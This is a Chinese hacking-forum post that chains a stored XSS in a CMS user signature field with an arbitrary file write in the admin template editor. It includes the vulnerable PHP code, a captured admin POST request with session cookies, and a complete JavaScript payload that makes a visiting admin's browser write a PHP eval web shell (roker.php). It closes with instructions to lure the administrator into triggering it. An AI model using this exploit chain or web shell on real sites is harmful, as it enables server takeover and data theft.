| 这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题7 j p6 d3 W4 F# O+ E; }7 f/ P 官网已经修补了,所以重新下了源码 因为 后台登入 还需要认证码 所以 注入就没看了。8 ?% o* A, f1 m! z. V 存在 xss; P" r; ?" j! @' v$ u' J 漏洞文件 user/member/skin_edit.php 本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名: </span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?> * P! s3 M* }. l7 ` </textarea></td></tr>" h; X$ ?( F9 v8 h5 K3 e9 s, A/ Y & j- P+ V% s8 B- q: R1 e% o user/do.php * P0 A8 Z- t1 h' W" D7 p if($op=='zl'){ //资料 if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);')); 9 R L B8 w" t $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."', CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."' where CS_Name='".$cscms_name."'"; if($db->query($sql)){+ V! K& k, D' F( B9 H ) F5 B) e4 b2 }7 v exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);')); }else{9 ^. U8 h6 K) I2 I exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);')); / r* D T3 @# ?+ S }: w% @1 d% X3 V ; }' v4 T# m( k+ K 没有 过滤导致xss产生。 后台 看了下 很奇葩的是可以写任意格式文件。。 抓包。。 9 e9 F" z( { d2 ` 本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1 ) q5 J9 ?& U$ y) }- x% F Accept: text/html, application/xhtml+xml, */*, t: H v# P+ ]# s4 h8 x 2 t# l7 R" l1 T+ h/ T' t ] Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php5 c# [& t [4 g3 U3 M1 M, e 4 Y; y$ x! K; } Z( m Accept-Language: zh-CN User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) Content-Type: application/x-www-form-urlencoded + \4 ]: \% E4 m' ? Accept-Encoding: gzip, deflate Host: 127.0.0.1 Content-Length: 38 DNT: 1: p. @# t/ \; N M) z( C Connection: Keep-Alive' \5 W% B7 W4 Q! |( G / d* ~3 H. q# {, P" P& f Cache-Control: no-cache 1 o. P- f; k3 t( v Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594 # ?+ O% y1 e1 W- k5 m0 m2 S name=aaa.php&content=%3Cs%3E%3Ca%25%3E 于是 构造js如下。. ?: F$ ]0 @2 k& R7 b% x$ x 本帖隐藏的内容<script> thisTHost = top.location.hostname; thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/"; + m4 y3 i. C4 Z function PostSubmit(url, data, msg) { var postUrl = url;( y- ]4 ]8 @/ i9 a 2 D6 a2 G$ a& a' m8 ]: D9 [ var postData = data; var msgData = msg; var ExportForm = document.createElement("FORM"); ! I8 m+ p- F1 I; b# Q' g document.body.appendChild(ExportForm); + |# ?- ^8 r& Q: a ExportForm.method = "POST"; 7 Z& L5 J4 [7 o var newElement = document.createElement("input"); + ^# H) g8 G' M. F2 [- u newElement.setAttribute("name", "name"); newElement.setAttribute("type", "hidden"); 8 T: L: q. Z( x- B var newElement2 = document.createElement("input"); newElement2.setAttribute("name", "content"); 9 P0 j c* s+ \7 I( p6 S newElement2.setAttribute("type", "hidden"); ExportForm.appendChild(newElement); + O$ H& k x( V# o' x2 f& N c ExportForm.appendChild(newElement2); newElement.value = postData; newElement2.value = msgData; u, S* \+ q; U9 |0 c ExportForm.action = postUrl; . |3 n, k/ ?9 D4 F' Z, e$ J ExportForm.submit(); ' y9 Q3 G8 I) a9 a4 _& d# b }; PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>"); </script> # G9 E2 P: K! J' H& C ( I- y8 v, I8 x http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入 用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改) 就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |